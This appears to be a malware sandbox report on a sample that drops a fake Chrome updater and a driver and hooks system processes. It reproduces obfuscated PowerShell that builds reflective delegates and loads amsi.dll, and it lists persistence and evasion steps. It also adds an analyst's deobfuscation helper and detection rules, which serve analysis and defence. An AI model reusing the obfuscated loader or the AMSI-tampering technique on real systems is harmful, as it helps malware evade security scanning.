$_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMw
          Source: unknown | Process created (identical entry recorded twice; the second copy is collapsed): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](1
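Every string the command lines above need (the dynamic assembly name, the module name, Microsoft.Win32.UnsafeNativeMethods, amsi.dll, the SOFTWARE hive key) is assembled at run time from `''+[Char](N)+'x'` concatenations, so no signature-worthy literal exists in the script text; the Anti Malware Scan Interface entries are excerpts of that same script as AMSI received it. The Python below is an added analyst helper, not code from the report or from the sample. It folds each `+`-joined run of single-quoted literals and `[Char](N)` casts back into one literal and lists the literals that come out. The four fragments are copied from the entries above and are excerpts only; the `$`-variable names inside them are the sample's own.

```python
import re

# One concatenation operand in the obfuscated PowerShell: a single-quoted
# literal (very often the empty string '') or a [Char](N) cast.
_TOKEN = r"(?:'[^']*'|\[Char\]\(\d+\))"
# A whole '+'-joined run of such operands, e.g. ''+[Char](82)+'e'+[Char](102)
_RUN = re.compile(_TOKEN + r"(?:\s*\+\s*" + _TOKEN + r")*")


def _operand_value(tok: str) -> str:
    """Evaluate one operand: "[Char](82)" -> "R", "'ab'" -> "ab", "''" -> ""."""
    if tok.startswith("[Char]("):
        return chr(int(tok[len("[Char]("):-1]))
    return tok[1:-1]


def deobfuscate(ps: str) -> str:
    """Fold every run of literals and [Char] casts into a single literal.

    Single-quoted PowerShell strings have no escapes except '' for a literal
    quote inside a string; this sample never uses that form, so '' is read as
    the empty string. A lone [Char](N) becomes the one-character literal 'c',
    which reads the same even though PowerShell would type it as [char].
    """
    def fold(m):
        parts = re.findall(_TOKEN, m.group(0))
        return "'" + "".join(_operand_value(p) for p in parts) + "'"

    return _RUN.sub(fold, ps)


def recovered_literals(ps: str, min_len: int = 3) -> list:
    """Distinct string literals present after folding, in first-seen order."""
    seen, out = set(), []
    for lit in re.findall(r"'([^']*)'", deobfuscate(ps)):
        if len(lit) >= min_len and lit not in seen:
            seen.add(lit)
            out.append(lit)
    return out


# Excerpts copied from the report's process-creation and AMSI entries (not the
# whole script); the $-variable names are the sample's own.
SAMPLE_FRAGMENTS = [
    "[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False)",
    ".GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'')",
    "GetDelegateForFunctionPointer($pGTzdTbPDPtdSw,$PKjZFAJMrKtEHtCAQET).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'')",
    "[Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+'E'+'')",
]

if __name__ == "__main__":
    for frag in SAMPLE_FRAGMENTS:
        print(deobfuscate(frag))
    print(recovered_literals("\n".join(SAMPLE_FRAGMENTS)))
```

Run against the full command lines, the same folding exposes the rest of the reflective delegate construction (the type and method names passed to DefineType, DefineConstructor and DefineMethod) and the assembly being pulled out of the registry, which is the point at which a signature or a hunting query can be written against the recovered literals rather than the noisy `[Char]` form.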
          Source: C:\Windows\System32\dialer.exe | Code function: 66_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect | 66_2_0000000140832D30
          Source: egFMhHSlmf.exe | Static PE information: section name: .00cfg
          Source: updater.exe.0.dr | Static PE information: section name: .00cfg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467646D push ebx; retf 0009h | 29_2_00007FFD3467657A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD346764FB push ebx; retf 0009h | 29_2_00007FFD3467657A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD346719DA pushad ; ret | 29_2_00007FFD346719E9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FFD3467B05C push esp; retf | 29_2_00007FFD3467B05D
          Source: C:\Windows\System32\conhost.exe | Code function: 32_3_000001D29E8AB0ED push rcx; retf 003Fh | 32_3_000001D29E8AB0EE
          Source: C:\Windows\System32\winlogon.exe | Code function: 50_3_000002D01659B0ED push rcx; retf 003Fh | 50_3_000002D01659B0EE
          Source: C:\Windows\System32\lsass.exe | Code function: 64_3_000002D6F14FB0ED push rcx; retf 003Fh | 64_3_000002D6F14FB0EE
          Source: C:\Windows\System32\dialer.exe | Code function: 65_2_0000000140001394 push qword ptr [0000000140009004h]; ret | 65_2_0000000140001403
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 67_2_00007FFD346963B1 push ebx; retf 0009h | 67_2_00007FFD346963FA
          Source: C:\Windows\System32\conhost.exe | Code function: 68_3_00000146F6AEB0ED push rcx; retf 003Fh | 68_3_00000146F6AEB0EE
          Source: C:\Windows\System32\svchost.exe | Code function: 69_3_0000014E41FBB0ED push rcx; retf 003Fh | 69_3_0000014E41FBB0EE
          Source: C:\Windows\System32\dwm.exe | Code function: 70_3_000001D15B06B0ED push rcx; retf 003Fh | 70_3_000001D15B06B0EE

          Persistence and Installation Behavior

          Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\xptjtnajcbas.sys
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | File created: C:\ProgramData\Google\Chrome\updater.exe (dropped file; identical entry recorded twice)
          Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\Temp\xptjtnajcbas.sys (dropped file; identical entry recorded twice)
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
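The entries above give the installation chain: the sample drops updater.exe under C:\ProgramData\Google\Chrome\ (a path that borrows Chrome's name), that binary writes a .sys file into C:\Windows\Temp (the WinRing0.pdb path found in updater.exe's memory is consistent with the WinRing0 driver that XMRig ships for MSR access), and sc.exe stops UsoSvc. Further down, under hooking, dialer.exe also writes a value named dialerstager directly under HKEY_LOCAL_MACHINE\SOFTWARE. The Python below is an added detection example, not part of the report: it runs five rules over constructed events modelled on those entries (plus two benign control rows), including a correlation rule that fires only when a binary the chain itself dropped goes on to write a driver. The event layout is a made-up stand-in for Sysmon process, file and registry events; the service list holds only UsoSvc because that is what the report shows, and is meant to be extended.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Event:
    kind: str    # "process" (command line), "file" (path written), "registry" (key -> value)
    image: str   # process that performed the action
    detail: str


# Constructed events modelled on the report's entries; not real telemetry.
SAMPLE_EVENTS = [
    Event("process", r"C:\Users\user\Desktop\egFMhHSlmf.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    Event("file", r"C:\Users\user\Desktop\egFMhHSlmf.exe", r"C:\ProgramData\Google\Chrome\updater.exe"),
    Event("file", r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\Temp\xptjtnajcbas.sys"),
    Event("registry", r"C:\Windows\System32\dialer.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE -> dialerstager"),
    # benign control rows that must not fire
    Event("process", r"C:\Windows\System32\svchost.exe", r"C:\Windows\system32\sc.exe query wuauserv"),
    Event("file", r"C:\Windows\System32\svchost.exe", r"C:\Windows\Temp\report.txt"),
]

# Services whose stop is worth an alert; UsoSvc comes from the report.
SERVICES_TO_PROTECT = {"usosvc"}

Rule = Callable[[Event, Set[str]], Optional[str]]


def sc_stop(e: Event, _dropped: Set[str]) -> Optional[str]:
    if e.kind != "process":
        return None
    m = re.search(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", e.detail, re.I)
    if m and m.group(1).lower() in SERVICES_TO_PROTECT:
        return f"service stop via sc.exe: {m.group(1)}"
    return None


def driver_in_temp(e: Event, _dropped: Set[str]) -> Optional[str]:
    if e.kind == "file" and re.fullmatch(r"c:\\windows\\temp\\[^\\]+\.sys", e.detail, re.I):
        return "driver written to C:\\Windows\\Temp"
    return None


def fake_chrome_updater(e: Event, _dropped: Set[str]) -> Optional[str]:
    if e.kind == "file" and re.fullmatch(r"c:\\programdata\\google\\chrome\\[^\\]+\.exe", e.detail, re.I):
        return "executable dropped under ProgramData\\Google\\Chrome"
    return None


def value_under_software_root(e: Event, _dropped: Set[str]) -> Optional[str]:
    # A value stored at the root of the SOFTWARE hive (no vendor subkey) is unusual.
    if e.kind == "registry" and re.fullmatch(r"hkey_local_machine\\software -> [^\\]+", e.detail, re.I):
        return "value written directly under HKLM\\SOFTWARE"
    return None


def dropped_binary_stages_driver(e: Event, dropped: Set[str]) -> Optional[str]:
    # Correlation: the writer of the driver is itself a file this chain created.
    if e.kind == "file" and e.image.lower() in dropped and e.detail.lower().endswith(".sys"):
        return "dropped executable writes a driver"
    return None


RULES: List[Rule] = [sc_stop, driver_in_temp, fake_chrome_updater,
                     value_under_software_root, dropped_binary_stages_driver]


def evaluate(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (verdict, image, detail) for every rule hit over the event list."""
    dropped = {e.detail.lower() for e in events
               if e.kind == "file" and e.detail.lower().endswith(".exe")}
    hits = []
    for e in events:
        for rule in RULES:
            verdict = rule(e, dropped)
            if verdict:
                hits.append((verdict, e.image, e.detail))
    return hits


if __name__ == "__main__":
    for verdict, image, detail in evaluate(SAMPLE_EVENTS):
        print(f"{verdict:55} {image} -> {detail}")
```

The single-event rules are cheap and will fire on their own; the correlation rule is the one that separates this chain from an administrator who legitimately stages a driver, because it requires the writer to be a binary that appeared on disk earlier in the same event stream.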

          Hooking and other Techniques for Hiding and Protection

          Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries)
          Source: winlogon.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\dialer.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE dialerstager
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (identical event listed 166 times; this corresponds to SetErrorMode(SEM_NOOPENFILEERRORBOX), which suppresses the file-not-found error dialog and is low-signal on its own, since benign processes set it as well)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle 45_2_0000000140001860
          Source: C:\Windows\System32\dialer.exe System information queried: FirmwareTableInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5546
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4291
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5600
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2055
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8309
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1297
          Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 4552
          Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 5447
          Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9939
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3224
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2813
          Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9873
          Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 612
          Source: C:\ProgramData\Google\Chrome\updater.exe Dropped PE file which has not been started: C:\Windows\Temp\xptjtnajcbas.sys
          Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_45-623)
          Source: C:\Windows\System32\dialer.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess (graph_26-197)
          Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess (graph_45-628)
          Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_45-585)
          Source: C:\Windows\System32\conhost.exe API coverage: 5.0 %
          Source: C:\Windows\System32\lsass.exe API coverage: 6.8 %
          Source: C:\Windows\System32\dialer.exe API coverage: 0.8 %
          Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184 Thread sleep count: 5546 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184 Thread sleep count: 4291 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632 Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 948 Thread sleep count: 5600 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4876 Thread sleep count: 2055 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532 Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132 Thread sleep count: 8309 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132 Thread sleep count: 1297 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\dllhost.exe TID: 6816 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 5860 Thread sleep count: 4552 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 5860 Thread sleep time: -4552000s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 5860 Thread sleep count: 5447 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 5860 Thread sleep time: -5447000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 6488 Thread sleep count: 9939 > 30
          Source: C:\Windows\System32\lsass.exe TID: 6488 Thread sleep time: -9939000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132 Thread sleep count: 3224 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2760 Thread sleep count: 2813 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724 Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084 Thread sleep time: -1844674407370954s >= -30000s
